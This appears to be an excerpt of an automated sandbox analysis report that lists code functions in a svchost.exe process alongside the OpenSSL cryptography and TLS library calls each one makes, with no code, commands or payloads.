Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE87FE0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_mark,ERR_clear_last_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CE87FE0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6FFD0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE6FFD0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE999B3 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CE999B3
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE619A0 CRYPTO_malloc, 46_2_00007FFA2CE619A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9999C EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,CRYPTO_malloc,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free, 46_2_00007FFA2CE9999C
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE99985 ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free, 46_2_00007FFA2CE99985
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE31950 CRYPTO_free,CRYPTO_strdup, 46_2_00007FFA2CE31950
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE87920 ERR_new,ERR_set_debug,CRYPTO_malloc,COMP_expand_block,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE87920
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE718E9 CRYPTO_malloc,CRYPTO_free, 46_2_00007FFA2CE718E9
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE818D0 CRYPTO_free, 46_2_00007FFA2CE818D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE578D0 BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE578D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5B8D0 CRYPTO_free,CRYPTO_free,OSSL_ERR_STATE_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE5B8D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE938C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug, 46_2_00007FFA2CE938C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8B8C0 CRYPTO_free, 46_2_00007FFA2CE8B8C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3DAA0 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_new,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_memdup,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE3DAA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9BAA0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free, 46_2_00007FFA2CE9BAA0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE33A70 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OSSL_STACK_OF_X509_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE33A70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE43A70 CRYPTO_get_ex_data, 46_2_00007FFA2CE43A70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE61A60 CRYPTO_free, 46_2_00007FFA2CE61A60
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2DA50 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OSSL_STACK_OF_X509_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free, 46_2_00007FFA2CE2DA50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7DA40 CRYPTO_memcmp, 46_2_00007FFA2CE7DA40
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE29A20 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug, 46_2_00007FFA2CE29A20
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE579D0 CRYPTO_malloc,memcpy,BIO_snprintf,BIO_snprintf,CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_new_file,BIO_free_all,CRYPTO_free,BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE579D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE47B50 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,ERR_new,ERR_set_debug,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug, 46_2_00007FFA2CE47B50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE99B4A memset,CRYPTO_zalloc,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CE99B4A
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE99B33 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestVerify,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free, 46_2_00007FFA2CE99B33
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6BB00 CRYPTO_free, 46_2_00007FFA2CE6BB00
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5FCB0 CRYPTO_free, 46_2_00007FFA2CE5FCB0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE99CAA ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free, 46_2_00007FFA2CE99CAA
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8FC90 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CE8FC90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE91C70 CRYPTO_realloc, 46_2_00007FFA2CE91C70
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE29C50 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free, 46_2_00007FFA2CE29C50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE21C50 CRYPTO_zalloc, 46_2_00007FFA2CE21C50
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE23C40 ERR_clear_error,ERR_new,ERR_set_debug,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,SetLastError,BIO_read,BIO_ADDR_new,BIO_ctrl,BIO_ctrl,BIO_ADDR_free,BIO_write,BIO_ctrl,BIO_test_flags,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_ctrl,BIO_ADDR_clear,BIO_write,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,BIO_test_flags,BIO_ADDR_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error, 46_2_00007FFA2CE23C40
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA9C40 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CEA9C40
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE73C30 CRYPTO_zalloc,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE73C30
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3BC10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup, 46_2_00007FFA2CE3BC10
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE27BEE CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE27BEE
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE21BE0 CRYPTO_zalloc, 46_2_00007FFA2CE21BE0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE475B0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free, 46_2_00007FFA2CE475B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE895A0 CRYPTO_free, 46_2_00007FFA2CE895A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE29590 CRYPTO_free,CRYPTO_memdup, 46_2_00007FFA2CE29590
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8B590 CRYPTO_free, 46_2_00007FFA2CE8B590
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE45550 CRYPTO_malloc,CRYPTO_new_ex_data,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,ERR_new,ERR_set_debug,ERR_set_error,X509_chain_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup, 46_2_00007FFA2CE45550
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEAB550 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CEAB550
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE89540 OPENSSL_cleanse,CRYPTO_free, 46_2_00007FFA2CE89540
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2B500 CRYPTO_free, 46_2_00007FFA2CE2B500
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE35500 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup, 46_2_00007FFA2CE35500
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE434E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free, 46_2_00007FFA2CE434E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8D4E0 ERR_new,ERR_set_debug,CRYPTO_free, 46_2_00007FFA2CE8D4E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE974E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE974E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE916B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug, 46_2_00007FFA2CE916B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE3D68B X509_VERIFY_PARAM_free,BIO_pop,BIO_free,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,OSSL_STACK_OF_X509_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,BIO_free_all,BIO_free_all,CRYPTO_free, 46_2_00007FFA2CE3D68B
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE43650 CRYPTO_THREAD_unlock, 46_2_00007FFA2CE43650
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA1650 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CEA1650
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE89620 CRYPTO_malloc,ERR_new,ERR_set_debug, 46_2_00007FFA2CE89620
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5B5F0 CRYPTO_free, 46_2_00007FFA2CE5B5F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8D5F0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new, 46_2_00007FFA2CE8D5F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8B5E0 CRYPTO_free, 46_2_00007FFA2CE8B5E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE775D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE775D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE215D0 CRYPTO_free, 46_2_00007FFA2CE215D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE235C8 CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags, 46_2_00007FFA2CE235C8
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE35780 a2i_IPADDRESS,ASN1_OCTET_STRING_free,X509_VERIFY_PARAM_get1_ip_asc,CRYPTO_free,X509_VERIFY_PARAM_add1_host, 46_2_00007FFA2CE35780
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE95760 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE95760
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE21740 CRYPTO_zalloc,CRYPTO_free, 46_2_00007FFA2CE21740
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE89730 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_free, 46_2_00007FFA2CE89730
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE33700 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE33700
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9B6E0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,RAND_bytes_ex,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug, 46_2_00007FFA2CE9B6E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE736D0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE736D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE876D0 CRYPTO_free, 46_2_00007FFA2CE876D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE556D0 CRYPTO_zalloc, 46_2_00007FFA2CE556D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE236C0 X509_VERIFY_PARAM_get0_peername,BIO_get_shutdown,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free, 46_2_00007FFA2CE236C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE27870 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free, 46_2_00007FFA2CE27870
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8B870 CRYPTO_free, 46_2_00007FFA2CE8B870
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9985F memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,memcmp,memcmp,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free, 46_2_00007FFA2CE9985F
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE29850 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free, 46_2_00007FFA2CE29850
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE35840 i2d_PUBKEY,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,d2i_PUBKEY,EVP_PKEY_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free, 46_2_00007FFA2CE35840
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE43840 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE43840
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE33820 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,CRYPTO_realloc, 46_2_00007FFA2CE33820
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE75190 BIO_free,CRYPTO_free, 46_2_00007FFA2CE75190
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4D140 CRYPTO_free,CRYPTO_malloc, 46_2_00007FFA2CE4D140
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9B140 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_size,ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free, 46_2_00007FFA2CE9B140
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE39120 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE39120
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE71127 CRYPTO_realloc, 46_2_00007FFA2CE71127
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5D100 CRYPTO_free, 46_2_00007FFA2CE5D100
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE7F0F0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy, 46_2_00007FFA2CE7F0F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE910E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CE910E0
